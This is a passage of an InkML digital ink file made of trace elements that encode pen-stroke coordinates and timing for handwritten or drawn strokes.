0-49-16,0 0-138 0,0 0-265 0,0 0 117 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="181383.6303">5496 11171 22 0,'10'4'33'0,"-1"1"-3"16,0 0-3-16,1 0-1 0,3-1-4 0,-4-1 2 15,5 1-8-15,-4 0 6 0,1 2-7 0,1-1 1 16,-2-3-1-16,3 3-2 0,-1-1-4 0,-2-1 3 15,1 0 2-15,2-1-4 0,-2 2-1 0,-1 0 3 0,1-3 4 16,1 1 1-16,2-1 5 0,-4 1-2 16,3-2 2-16,0 0 0 0,-2 0 5 0,4-2-5 15,3 0-5-15,-2-3 9 0,3-2-4 0,-1 2 2 16,-1-5 3-16,0 3-12 0,0-5 6 16,3 2-5-16,2-6-1 0,-3 5-4 0,-2-1 6 0,-2 1 3 0,-1-2-1 15,1-1 4-15,-2-1-3 0,0 2-7 16,0-3-2-16,-2-1 8 0,7-3-3 0,-3-1-9 15,-3 5 13-15,-2-7-7 0,4-1-7 0,-1 1 0 16,0-2 6-16,0 1-6 0,0-6-3 0,-2 2 18 16,2 0-13-16,-4 1-4 0,1-3 6 0,-1 6-5 15,0-2 4-15,2 1-13 0,-6 5 10 0,2 4 0 16,-1-2-3-16,0 0 6 0,-2-2-2 0,3 2-3 16,-3 1 0-16,-1 0 8 0,1 0-3 0,0 3-7 15,-4-3 1-15,1 5-1 0,-1-1 2 0,-1-1 2 16,-4-2 3-16,1 3-2 0,-2 4 4 0,1-4-8 15,-7-1 0-15,3-1 4 0,-2 4-5 0,-3-1 1 16,1-1-1-16,-4 2-2 0,1 0 2 0,-2 1-4 16,1 0-3-16,-1 0 8 0,-1 3-6 0,1-2 0 15,-1 2 6-15,0 0-13 0,-2 2 5 0,-5 0 1 0,3 2-8 16,-4-1 13-16,6 3 3 0,-8-1 2 0,-1 3-7 16,2 0 5-16,7 2-2 0,0-1-5 15,-1 0 0-15,-4 6 3 0,4-4-2 0,-5 9 2 16,1-2 0-16,2 4-12 0,-1 2 15 0,-2 2-12 15,4 0 6-15,0 3 5 0,1 1-8 0,-1 3 3 0,4 1 6 16,-4 3 2-16,1 1-8 0,3-3 4 0,2 4-1 16,0 1-6-16,1-3 6 0,3 1-1 15,3 1-1-15,1-3 3 0,3 1 3 0,-2-2 0 16,7-1-3-16,-2-1-5 0,3-2-2 0,0-6-2 0,2 0 3 16,2-1 5-16,0-1-5 0,2 1-2 0,1-2-2 15,2-1-13-15,5 1-1 0,-3-3-8 0,5 0-10 16,0-2-11-16,6 4-3 0,4-3-17 0,2-1-50 15,-1-2-131-15,3-2 58 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="182261.8924">7538 10588 47 0,'-1'-3'69'15,"-3"-2"-9"-15,4 5-6 0,-4-3-3 0,4-2-2 16,0 5 1-16,-2-8-8 0,0 3-6 0,0 2-4 15,2-4-6-15,-3 0 4 0,2 4-6 0,1-6 4 16,-4 4 1-16,4-1-3 0,-1 0-2 0,-2 0-1 16,1 0 1-16,-1 1 1 0,2-1-8 0,-4 0 1 15,1-1 2-15,-1-1-7 0,1 3-4 0,-1-4 9 16,-3 2-5-16,-1-1-4 0,0 0 0 0,0 2 0 16,-1-2 0-16,1 0 1 0,-4-2-12 0,2 1 8 15,-3 1-3-15,-1 0 0 0,3 1-4 0,-5 1 11 16,6 1-15-16,1 0 6 0,-3 1-5 0,1 1 2 15,-1 0 2-15,2 1 0 0,-2 1 3 0,-2 2-5 16,2 1 1-16,-5 5 2 0,-1 2-10 0,-5 5 10 16,-3 2-3-16,1 0-7 0,1 3 13 0,3 4-6 15,-1-4-2-15,0 1 10 0,4 3-5 0,1-1 1 16,0 3-5-16,4-2 6 0,0 2-3 0,3-2-1 16,0 4-15-16,3 1 22 0,-2-2-4 0,5 0-2 15,1 3 0-15,2-4 4 0,-1 2-8 0,5-1 7 16,-2 1 8-16,3 0-14 0,3-2 3 0,0-1 6 15,1 1-3-15,0-7-2 0,5 6-3 0,-3-5 0 16,3-2 0-16,1 2 1 0,1-1 0 0,-4-4 4 16,9 6-10-16,-3-8 2 0,-1 2 5 0,-2-1 10 0,6-1-7 15,-2 0 4-15,1 0-11 0,-2-4 3 16,3 3-2-16,2-4 7 0,-2 3-1 0,1-5 0 16,1 2-3-16,-2-3 8 0,3-1 0 0,-4 0-3 15,1-2 8-15,-1-1 6 0,0-1-3 0,2-2 8 16,-3 0-5-16,3-2-8 0,-2-1 11 0,0 1-19 0,1-1 22 15,7-6-10-15,-3-1 8 0,2-4-8 16,1-1 4-16,1-4-3 0,-1 0-3 0,1-2 5 16,-4-3-1-16,2 3 0 0,4-15-8 0,-1 0 1 15,0 1 2-15,2 1-1 0,-9 6 2 0,10-11-6 0,-2 0 0 16,-8 12 4-16,6-11-6 0,-8 12 2 0,-2 0 7 16,-1 0-1-16,-3 2-9 0,-2-2 3 0,-3 3-10 15,-5 7 3-15,-1 0 4 0,-2 0 2 16,-1-1-17-16,-3 4-16 0,0 1-15 0,-5-2-30 0,2 10-34 15,-9-3-82-15,-11 5-203 0,-2-1 91 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="189900.6752">2707 12471 5 0,'4'2'10'16,"1"-2"-3"-16,-1 2 0 0,4-1 3 0,-2 1-2 16,0-1 0-16,0 2-4 0,0-1 3 15,-1 0-1-15,3 1-2 0,-2-1 2 0,1-1-8 0,-1 1 4 16,0-1 0-16,2 2 1 0,0-1-3 0,-2 2 3 15,2-3-2-15,1 2 6 0,2 0-6 0,-2 0 3 16,1-1 5-16,1 1-2 0,0 0 3 0,2-2-4 16,0 3 3-16,3-1 4 0,1 0 0 15,1 1 0-15,-5-1 0 0,6 1-2 0,0-2 2 0,1 1-4 16,1 0 0-16,-5-1 2 0,4 1 1 0,1-1 2 16,0 2-2-16,7-1-3 0,-1-1 7 0,-6-1-6 15,9 3 3-15,-3 2-2 0,1-4-1 0,1 3 1 16,-3-3-1-16,-6 1-1 0,11 1 0 0,-10-1-5 15,6 2-1-15,-6-3 8 0,3 1-3 16,-4 0-6-16,1 0 1 0,1-1 0 0,-2 3 1 0,0-4 2 16,1 0-3-16,-2 0 2 0,-1 1-2 0,1 1 2 15,-1 1-1-15,0-2-1 0,-4-1-1 0,4 2 1 16,-4-2 0-16,-1 2 0 0,5-3 5 0,-5 1 0 16,-2 1-6-16,3-2 1 0,-1 0 0 15,2 0 3-15,-2 3-6 0,2-2 6 0,-2-1-5 0,6 2 11 16,-2-2-9-16,2 0 0 0,-1 1 3 0,4-2-3 15,-2-1-3-15,2 2 6 0,-2 0 0 0,1-1-6 16,7-2 5-16,-9 1-1 0,1 2-3 0,2 0 1 16,-4-1 0-16,1 1 3 0,0 0-2 0,1 1 0 15,-3-2-2-15,0 1-2 0,-2 0 4 0,2 0 0 16,0 0-1-16,-1 0 0 0,-2 0 1 0,-2 0 1 16,1 0-4-16,-1 0 0 0,1 0 2 0,-3 0-2 15,-1-2 3-15,-1 1 3 0,5 0 0 0,-7 1-3 16,2 0-1-16,1 0 7 0,-3-2-4 0,2 1 5 15,-3 0 7-15,3 1-3 0,1-2-4 0,-2 0-1 16,0 1 7-16,-1 1 5 0,2-3 0 0,-2 2-12 16,2-1 3-16,-3 1-6 0,1 1 2 0,2-2 0 15,-3 0 0-15,1-1 6 0,2 1-5 0,-3-1-1 16,0 0-5-16,0 2 7 0,1-1 3 0,0 2-2 16,-1-2 0-16,-5 2-16 0,6-4 5 15,-2 3 2-15,-4 1 0 0,8-3-1 0,-8 3-2 0,5-2 6 16,-5 2-5-16,4-3 3 0,-4 3-3 0,9-1-1 15,-9 1 3-15,5-2-2 0,-5 2 12 0,4-1-17 16,-4 1 3-16,0 0 1 0,0 0-2 0,6-1 1 16,-6 1 6-16,0 0-6 0,4-3-4 15,-4 3 4-15,0 0 3 0,8-2 0 0,-8 2 2 0,0 0-3 16,6-1 3-16,-6 1-2 0,5-1-4 0,-5 1 5 16,0 0 0-16,7-2-4 0,-7 2 2 0,0 0 2 15,3-3-1-15,-3 3-3 0,0 0 6 0,3-1-4 16,-3 1-3-16,0 0 13 0,0 0-6 15,0 0-3-15,0 0 4 0,0 0 0 0,0 0-5 16,0 0 1-16,0 0 3 0,0 0 0 0,0 0-1 0,0 0-1 16,0 0 5-16,0 0-1 0,0 0-4 0,0 0 2 15,0 0 4-15,0 0-2 0,0 0 4 0,0 0-7 16,0 0 2-16,0 0 3 0,0 0 6 0,0 0-8 16,0 0 9-16,0 0-11 0,0 0 3 15,0 0 2-15,0 0-8 0,0 0 8 0,0 0 0 0,0 0-8 16,0 0 7-16,0 0-7 0,0 0-3 0,0 0 10 15,0 0 2-15,0 0-1 0,0 0-5 0,0 0-5 16,0 0 5-16,0 0-11 0,0 0 3 0,0 0 0 16,0 0-3-16,0 0 6 0,0 0-1 0,0 0-3 15,0 0 2-15,0-4-3 0,0 4 3 0,0 0-2 16,0 0 4-16,0 0-9 0,0 0-2 0,0 0 8 16,0 0-4-16,0 0-5 0,0 0 1 0,0 0 2 15,0 0-2-15,0 0-4 0,0 0 1 0,0 0-5 16,0 0-3-16,0 0-2 0,0 0 5 15,0 0-5-15,0 0 0 0,0 0 3 0,0 0-1 0,0 0 8 16,0 0-3-16,0 0 1 0,0 0-1 0,0 0 1 16,0 0 1-16,0 0 6 0,0 0-4 0,0 0 4 15,0 0 2-15,0 0-3 0,0 0 4 0,0 0 2 16,0 0-4-16,0 0 2 0,0 0-2 0,0 0 5 16,0 0-3-16,0 0 2 0,0 0-2 0,0 0 7 15,0 0 3-15,0 0-9 0,8 5 6 0,-8-5-3 16,0 0 5-16,3 5-6 0,-3-5 0 0,4 3 1 15,-1-2-5-15,-3-1 7 0,6 4-3 16,-2-2 4-16,0 1-3 0,-1 0-2 0,0 0 3 0,2-1-2 16,-1 2 4-16,1-2-5 0,0 1 4 0,1 1-3 15,-1 0 4-15,2 2-3 0,-2-3-1 0,4 1 4 16,0 2-1-16,2-2 2 0,0 0-7 0,-2 2 5 16,1 0-1-16,2-1-2 0,-2 0-1 0,3 1 9 15,-3 0-6-15,4-1 1 0,1 2 4 0,2-1 0 16,1 0-6-16,-2 1 10 0,0-2-13 0,2 0 9 15,-2 0-5-15,2 1 2 0,0-2-4 0,-1 0 4 16,-2 3 2-16,-1-3-1 0,4-1-4 0,-3 2 8 16,-1-2-5-16,1 0-2 0,1 2 4 0,1 1-4 15,-1-4 2-15,-3 2-1 0,4-1-2 0,-1 2 6 16,-2-2-3-16,3-1-1 0,2 1-1 0,-1 0 2 16,0 2-1-16,-5-3 1 0,2 1 0 0,-2-2-1 15,0 1 2-15,-1-1-5 0,4 1 2 0,-3 2 0 16,-1-4 0-16,2 2 2 0,-2-1 1 0,3 0-1 15,-5-1-1-15,3 0 3 0,-1 0-7 0,-2 0 8 16,0 0-2-16,-1 0 0 0,-1 0 0 0,0-1 0 16,-1 2 4-16,-7-1-6 0,10-1 1 0,-5 0 4 15,-5 1 6-15,10-2-7 0,-4 2 8 0,-6 0-2 16,7 0-6-16,-7 0 1 0,7 0 2 0,-7 0 0 16,5-4-3-16,-5 4 1 0,4-2 3 0,-4 2-1 15,0 0 5-15,0 0-2 0,6-1-4 0,-6 1-7 16,0 0 7-16,0 0 7 0,0 0-10 0,0 0-3 15,0 0 2-15,0 0-7 0,0 0-12 0,0 0-25 16,0 0-44-16,0 0-92 0,0 0 41 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="199659.2154">7496 5484 11 0,'0'0'21'0,"0"0"1"0,0 0-3 0,0-5-5 16,0 5 3-16,0 0-7 0,0 0-2 0,0 0-3 16,13 7 0-16,-7-7 3 0,7 3 1 0,0 1 5 0,6-2-4 15,3 2 0-15,8 0-1 0,6 1-1 0,-3-1 6 16,8 2 2-16,9 0-4 0,2-2 0 0,3 0 9 15,-1 3-4-15,-2-1-5 0,-13-1-4 16,13 2 7-16,-16 1-2 0,1-1-7 0,4 1 5 0,-4 0 0 16,15 1 3-16,-15 0-3 0,3-4 5 0,-2 5-7 15,-2-2-8-15,0 1 8 0,1-1-2 0,0-1 5 16,1 3 1-16,14-2 0 0,-15 1 3 0,2-2 2 16,-2 1-1-16,2-1-9 0,-4-2 10 0,0 4-5 15,3-2 0-15,-6-1 0 0,0 2-1 0,-4-4 6 16,4 0 1-16,-6 1 2 0,3-2-2 0,-7 1-1 15,-2-2-8-15,-7-1 10 0,1 2-7 0,0-1 4 16,-5-2-6-16,4 2 0 0,-4 0 7 0,-3-2 5 16,3 2-8-16,-1-2 3 0,-3 2 0 0,0-2-3 15,-5 0 3-15,9 0-1 0,-1 1 4 0,-8-1-7 16,0 0-2-16,0 0 2 0,0 0-3 0,10-1 1 16,-10 1 2-16,0 0 0 0,0 0-2 0,4 1-1 15,-4-1-4-15,0 0 0 0,0 0 3 0,0 0-10 16,0 0-5-16,0 0 2 0,0 0-11 0,0 0-8 15,0 0-8-15,0 0-10 0,0 0-4 0,0 0-5 16,0 0-13-16,0 0-7 0,0 0-55 0,0 0-134 16,0 0 59-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="210452.3908">10649 7079 46 0,'0'0'58'0,"0"0"-5"0,0 0-9 16,0 0-6-16,0 0-4 0,0 0-3 0,0 0-6 15,0 0-2-15,15 0 2 0,-8 0 2 0,3 0 2 16,2 2-3-16,2-2-4 0,-1 1-2 0,0 1 4 16,1 0-2-16,5 0-9 0,3 0 1 0,-2 1-4 15,10 0 8-15,-1 2-4 0,-1-3 0 0,4 4-2 16,3-2 1-16,-1 2-1 0,1-1 2 0,1 2-4 16,0-3-2-16,4 0-1 0,-1 3 4 15,-1-2-8-15,-1 1 11 0,0 0-9 0,-2-1-2 0,-1 0 5 16,1 0 0-16,-6-1-1 0,3 1-1 0,-5 0 5 15,-7-2-9-15,-1 2 8 0,3-2-1 0,-4-1-2 16,0-1 2-16,-5 1-3 0,1-1-10 0,-4 0 15 16,3 0-2-16,-4 2-3 0,5 0-1 0,-4-2-11 15,-2-1 15-15,-1 1-6 0,1-1 1 0,0 0 4 16,-2 0-8-16,4-1 2 0,2 2 10 0,-5-1-1 16,1 0-5-16,1-1-6 0,-3 1 9 0,2-1-6 15,-3 2 2-15,0-4-3 0,-5 3-2 0,17 0 0 16,-12-1 8-16,4-2-7 0,-5 2 7 0,5 1-8 0,-3-1 0 15,-6 1 11-15,9-1-11 0,-2-1-2 16,-7 2 0-16,0 0 1 0,10 0 3 0,-10 0 4 16,6-1-9-16,-6 1 3 0,0 0-14 0,0 0-13 15,0 0 3-15,7 0-8 0,-7 0 3 0,0 0-6 0,0 0-14 16,0 0-22-16,0 0-41 0,-6-9-120 16,0 6 53-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="211051.5842">11516 6999 29 0,'62'7'52'0,"-6"0"-1"0,-7 1-9 0,2 0 1 15,-13 0-2-15,2 0-4 0,-7-1-7 0,4 0-1 16,-5 2 5-16,-1-3-6 0,-3 3-2 0,1-3-8 16,-2 1 5-16,-8 0 1 0,0-3-10 0,-1 0 10 15,1 0-5-15,-2 1-2 0,1-1-2 0,-5 0 3 16,5-1 5-16,-1 1 2 0,1-1-6 0,4 0 3 16,-4 1 0-16,1-2-6 0,0 1-6 0,-3-3 0 15,1 3 7-15,-2-2-3 0,-1 0-7 0,-2 0 4 16,2-1-5-16,3 0 5 0,-3 0-2 0,0-1 2 15,-1-1-5-15,2-1-3 0,-2 1 0 0,1 1 10 16,-5 0-12-16,-1 0-1 0,1-1 2 0,-4 1-5 0,1 0-22 16,-6 1-14-16,9-2-23 0,-9 2-63 15,8 0-134-15,-8 0 59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14T15:44:11.7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7037 6107 12 0,'-1'-6'27'0,"1"2"3"0,0 2-7 0,0-5 0 15,-3 4-4-15,3-3 3 0,0 3-1 0,0-4-1 16,0 2-2-16,-1-2 3 0,2 2-3 0,2-2 3 16,-3 0 5-16,0 2-4 0,0 0 4 0,1 1-3 15,-1 4-7-15,0-8 9 0,0 3-2 0,0 1-4 16,0 4 3-16,0-8-4 0,0 6-3 0,0 2-5 15,0-8-1-15,0 8 10 0,0-6-1 0,0 5 3 0,0 1 3 16,0-5 0-16,0 5-1 0,0 0 8 0,0-6-8 16,0 6-1-16,0 0 12 0,0 0-8 15,0 0-5-15,0 0-10 0,0 0-3 0,0 0 1 16,-4-3 5-16,4 3-9 0,0 0-3 0,0 0 9 16,0 0 7-16,0 0-16 0,0 0 5 0,0 0-1 0,0 0 3 15,0 0-3-15,0 0-6 0,0 0 1 0,0 0 3 16,0 0-9-16,0 0 16 0,0 0-3 0,0 0 4 15,0 0 7-15,0 0-7 0,0 0 17 16,-14 3-16-16,9 1 4 0,-1-2-3 0,-2 0-5 0,0-1 10 16,-2 1-4-16,-1 1-2 0,-1-1 1 0,-1 0-2 15,2 0-1-15,-1 2 0 0,-2-2-3 16,0 0-2-16,0 1 0 0,0 0-3 0,0-2-4 0,-1 2 10 16,-3 1 0-16,5-2-4 0,-1 1-5 0,0 0 2 15,-4 0-2-15,7 0-5 0,-4-1 14 0,1 1-6 16,-2-1 5-16,2-2-1 0,1 1-2 0,-1 1-3 15,-1 2 9-15,1-2-2 0,2 0-5 0,-2 0 3 16,1 0-7-16,-1-1 7 0,-5 1-9 0,1 0 6 16,1-2-4-16,0 3 2 0,-3-1 0 0,1-1 4 15,0 2-2-15,0-1-4 0,-2-2 4 0,-5 3 0 16,1-2-4-16,6 1-2 0,-3-2 0 0,-6 0 3 16,8-1 1-16,-3 0 11 0,2-1-30 0,1-2 15 15,2 1 13-15,-1 2-5 0,2-1 3 0,2-1-5 16,2-1 1-16,-1 0 6 0,1 0-5 0,2 0 17 15,-2-1-12-15,1-3 1 0,1 2-10 0,1 3 11 0,-2-4-1 16,1 0 1-16,2 2 8 0,0-3 5 16,-1 5 0-16,-1-4 5 0,1 1-2 0,0-3-10 15,1 1 5-15,-4-3-11 0,2-1-1 0,-5 4 2 16,1-4-5-16,1 2 3 0,0-4-2 0,-3 6-1 0,2-3-3 16,1-2-2-16,1 3 2 0,-1 0 1 15,3-3-7-15,-2 2 5 0,0-1-6 0,1-1-3 16,1 1 12-16,1-3-10 0,-3 2 11 0,4 3-7 15,0-4-2-15,-1 1 2 0,-2 1 1 0,3-4-4 0,-1 3-1 16,1 2 6-16,3-1-5 0,-2 4-2 0,1-4 6 16,-1 4-7-16,2-3-3 0,-1 2 1 0,1 1-15 15,-2-1-11-15,2 4 2 0,-1-2-11 16,2-2-14-16,0 1-9 0,-5 3-6 0,1-1 1 0,0 2 3 16,-2 0-3-16,-1 1 6 0,0 0 3 0,1 0 11 15,2 2 0-15,-4-2-8 0,7 2 2 0,-2 0 1 16,-1 1 4-16,0 0-1 0,2 1 1 15,-1-1 8-15,2 0 2 0,0 1 11 0,-1 1-3 0,0 0 6 16,7-2 2-16,-9 0-3 0,4 3 10 0,1-2-1 16,4-1-1-16,-7 2 5 0,3-1 3 0,4-1 0 15,-5 2 6-15,5-2-4 0,0 0 3 0,0 0 3 16,-7 0-3-16,7 0 7 0,0 0-4 16,0 0 6-16,0 0-1 0,0 0-2 0,0 0 7 0,-2 3 2 15,2-3-1-15,0 0-2 0,0 0 3 0,0 0-2 16,0 0-1-16,0 0-9 0,0 0 8 0,-4 2-4 15,4-2 6-15,0 0-2 0,0 9 2 0,3-4 12 16,-3 5 7-16,-3-1 2 0,6 3-11 0,-3 1 14 16,0 4-4-16,-3 0 2 0,3 2 2 0,0-1-5 15,0 2 4-15,0-3 0 0,-1 2-6 0,1-3 2 16,-3 1 5-16,3 0-20 0,3-7 17 0,-3 2-1 16,0 2-3-16,-3-4 2 0,6 1-11 0,-2-1 14 15,-1-1-16-15,0 0-12 0,3 1 7 0,-2-2 2 16,0-1 2-16,0 0 9 0,-1 1-5 0,2-2-7 15,0-2-1-15,-2 1 13 0,2-1-14 0,-1-1-6 16,0 1 7-16,-1-4 2 0,1 3-1 0,-1-3 0 16,0 0-8-16,3 4-16 0,-3-4-10 0,0 0-1 15,0 0-22-15,0 0-23 0,0 0-82 0,13-11-164 16,-7 1 74-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="212.505">5493 5601 47 0,'9'4'57'0,"0"-1"-4"0,4 2 4 0,5 0-5 15,1 1-5-15,1-3-3 0,5 7-2 0,3-2-7 16,1 0-6-16,-1 2-5 0,4-3-6 0,-2 1-5 15,-1 1-11-15,3-1-21 0,0-1-6 0,1 1-15 16,2 0-33-16,-1-1-79 0,2-1 35 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1213.3907">7824 5945 25 0,'4'5'31'0,"-4"0"-2"0,1 0-5 15,2-1-1-15,-3 2-9 0,1 1 6 0,1-2-6 16,-2 2 5-16,0 1 2 0,0 0 1 0,-2-2 1 16,1 2 3-16,-3 4-4 0,2-3 0 0,-2 2 1 15,-1 1 1-15,-3 0-4 0,0 0 6 0,-1 2 1 16,-1-1-7-16,-1 4 5 0,-1-3-5 0,-2-2 10 15,0 1-13-15,0 1 2 0,1-2-3 0,-1-2 1 16,-4 3 0-16,4 0-7 0,-9 0 8 0,5-1 1 16,0-3-10-16,-7 4 6 0,-1-1-7 15,2-1 0-15,0 2-2 0,-2 0 0 0,-1-1-1 0,0 0 3 16,3-3-4-16,-3 3 4 0,8-3-5 0,-6 0 3 16,4-3-2-16,-4 7-2 0,-1-6 3 0,4 0-3 15,2 0-7-15,-2-4 15 0,2 3-2 0,-2-1-3 16,0-4-5-16,-1 1 6 0,3-2-4 0,-7 0 3 15,4-1-7-15,-5-3 1 0,1-1 8 0,1 1-6 16,6-1 3-16,-8-5 7 0,1 3-4 0,8 0 7 16,-7-3-7-16,7 2 7 0,0-2 3 0,1 0 3 15,-1 0 0-15,2-1-12 0,-7-2 10 0,8 1-7 16,-1 0 5-16,2 0-6 0,0-2 0 0,0 0 2 16,1 4-2-16,0-5-1 0,1-2 3 0,0 3-10 15,2-2 6-15,-2 2 1 0,4 0-3 0,-1-4 10 16,-2 4-3-16,5-5-4 0,-3 6-2 0,1-1 2 15,2-2-2-15,1-2 1 0,-3 3-3 0,4 5 1 16,0-1 3-16,-2-5 4 0,2 0-9 0,0 5 1 16,0-4-7-16,0 2 6 0,0 2 0 0,-2-4-3 15,0-1 0-15,-1 0 1 0,3 1 5 0,-3 1 0 16,3-1-8-16,-4 1-1 0,3-1-4 0,2 5 9 16,-4-4 1-16,3 3-8 0,-1 2-10 0,-1-5 11 15,2 4 1-15,0 1-10 0,1 0-10 0,-1 0-4 0,1 3-9 16,3-1 0-16,-4 1-14 0,2 0-2 0,2 2-10 15,-3-2-3-15,2 2-1 0,0 1 0 16,2-1-2-16,0 4-39 0,-1-5-113 0,1 5 50 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1703.5332">6258 5645 8 0,'0'0'37'0,"-7"-1"-5"0,7 1 3 0,-5-1-4 16,5 1 3-16,0 0-7 0,0 0-3 16,-9 0-4-16,9 0-4 0,-6 3 5 0,2 4-3 0,-5 3 6 15,0 0 0-15,-1 4-1 0,-2 1-2 0,2 2 3 16,-4 6-7-16,-4 0 11 0,5 1-12 16,3-2 5-16,-1-5-3 0,4-2 0 0,-2 2-1 0,0 0 3 15,4-2-4-15,0-2-10 0,1 2 10 0,-2-1-1 16,2-3-3-16,0 1-13 0,0-5 10 0,3 4 5 15,-3-4-8-15,2-1 4 0,0-1-3 16,1 1 1-16,0-3 0 0,0 1 1 0,-1 0 0 0,2 0 0 16,0-4 0-16,0 0-5 0,0 4 2 0,0-4 2 15,0 0 0-15,0 0-11 0,0 0 7 0,0 0-3 16,15-11 0-16,-4 3-9 0,-1-4-6 0,0-1 0 16,2-1 3-16,-1-1-9 0,2-3-3 0,1-3 6 15,1 1 3-15,-3 3-3 0,-3 1 6 0,1 1-1 16,-1 2 5-16,-3 2-1 0,2 0 6 0,-2 3-2 15,-3 2 3-15,1 0 0 0,-2 1 2 0,0 2-1 16,2 1-5-16,-1-2-1 0,-3 4 5 0,7 0-1 16,-7 0 2-16,9 6 3 0,-4-4 1 15,3 4 4-15,1 3 6 0,2 0-7 0,0 2 8 0,3 1 2 16,1 1 13-16,1 0-6 0,2 0 2 0,5 1-6 16,-1 1 4-16,0 1 9 0,1-4-2 0,-1 6-2 15,0-7-5-15,3 1 12 0,0-2-11 0,-6 1-4 16,-2-4 1-16,1 0-15 0,-8-1-21 0,4-1-23 15,-2 3-16-15,-2-2-29 0,-1 1-52 0,-5-1-145 16,-1-2 64-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3874.6226">6991 11021 18 0,'0'0'28'0,"0"0"10"0,0 0-8 15,0 0 0-15,0 0 0 0,0 0 1 0,0 0-6 16,0 0-13-16,0 0 10 0,0 0-2 15,0 0-3-15,0 0-2 0,0 0 5 0,0 0-13 0,0 0 7 16,0 0 0-16,-8 10 0 0,7-8-4 0,-3 2 13 16,3 2-3-16,-4-1 9 0,1 2-1 0,0 0-3 15,-1-2 1-15,-3 4-3 0,0-2 1 0,0 0-9 16,0 0 7-16,0-1 5 0,0 0-5 0,0 2 2 16,-2-2 2-16,-3 2-4 0,1-2-2 0,-2 2-3 15,-1 0 0-15,1-3 1 0,0 4 4 0,1-4-1 16,-3 1 1-16,5-2-4 0,-7 3-14 0,2-1 13 15,-5-2-1-15,2 1-5 0,1 1 3 0,-1-2-3 16,1-1-3-16,-1 3 8 0,1-2-3 0,5-1-6 16,-3-1-5-16,-4 1 12 0,4-1 0 0,-2 4 1 15,-1-4-5-15,-1-1 5 0,0 2-5 0,1-3-3 16,-3 1 0-16,3-1 13 0,0 0 3 0,1 0 1 16,-1-1-2-16,-3-1-1 0,4 2-4 0,-3-2-3 15,2 0 2-15,-2-1-1 0,-3-2-5 0,5 3 8 16,-12-3-5-16,14 0 2 0,-6 0 5 0,-1 1 3 15,1-2-4-15,4-2-5 0,-7 0-5 0,6 2 4 16,2-2 3-16,-3 2-6 0,1-2 5 0,2 0 6 16,-1-1-5-16,-6-1-16 0,-4-1 9 0,11 2 4 0,-6-4-8 15,0 0 8-15,6 4-5 0,0-2-4 0,-5-2 1 16,1 0 2-16,4 0-10 0,3 3 11 16,-3-2-2-16,0-1-3 0,2 4 5 0,-1-2-8 15,0 1 8-15,2 0-4 0,1 0 2 0,0-2-1 0,0 0 0 16,1 2 0-16,2-3-1 0,-5 5 0 0,6-2-3 15,-3 3 3-15,3-9 1 0,0 10-5 16,0-2 3-16,-1-1 4 0,3 1-8 0,0 0-3 16,0 1 9-16,0-2-4 0,1 4 2 0,2-2 1 0,0 2-2 15,1 1-3-15,-1-1-9 0,1-1-4 0,-2-1-1 16,-1 1-3-16,3 2 2 0,0 0 0 0,-1 1-3 16,0-2-1-16,1 1-3 0,1-2-3 15,-1 4 1-15,0-2 5 0,0 1-8 0,3-2 5 0,1 5 2 16,-5-4-9-16,2 1 2 0,3 3 3 0,-4-2 3 15,4 2 1-15,-5-3 2 0,5 3 4 0,-5-3 1 16,5 3 1-16,0 0 1 0,0 0 2 16,-4-4-4-16,4 4 5 0,0 0-1 0,0 0-6 0,0 0 11 15,0 0-6-15,-4-3 0 0,4 3-2 0,0 0 9 16,0 0 1-16,0 0-1 0,0 0-8 0,0 0-6 16,0 0 19-16,0 0-5 0,0 0 2 0,0 0-3 15,0 0-2-15,0 0-6 0,0 0 15 0,0 0-13 16,0 0 14-16,0 0-9 0,4 13 6 0,-4-6 0 15,3 0-6-15,-2-2 1 0,2 7 9 0,-1-4-6 16,-2 5-4-16,5 3 4 0,0 0-3 0,-1-1 4 16,0 3 0-16,-1-1-3 0,0 0 6 0,0 0 2 15,1-1-2-15,2-1-4 0,-3-3 7 0,0-1 6 16,0 0-8-16,0 1 0 0,-1-2 1 0,1 0-4 16,-1-3-4-16,2 0 10 0,0 1-10 0,-2-1 6 15,1-1 4-15,-2-1-2 0,1 1 5 0,0 0-8 16,-1-4 0-16,2 2 7 0,-2-1-4 0,2 2-2 15,-2-3-2-15,-1-2 3 0,1 5 3 0,-1-5-9 16,2 2-3-16,-2-2 4 0,0 0-8 0,4 1 5 16,-4-1-3-16,0 0-14 0,0 0-14 0,0 0-12 15,5-6-17-15,-3-2-17 0,3 0-46 0,-3-4-138 16,3-4 62-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4117.2815">5437 10681 25 0,'0'0'48'15,"10"1"-1"-15,-1 2 4 0,4-1 2 16,1 1-4-16,3-2 4 0,-1 3-4 0,6-3-3 15,-4 3 2-15,5-3-12 0,8 2-2 0,-10-3-9 0,7 3 4 16,-2 0 3-16,-3-3-16 0,5 2-12 0,-5 0-13 16,-4 3-7-16,2 0-15 0,-3-2-20 0,-3 2-39 15,-1 2-97-15,-4 0 43 0</inkml:trace>
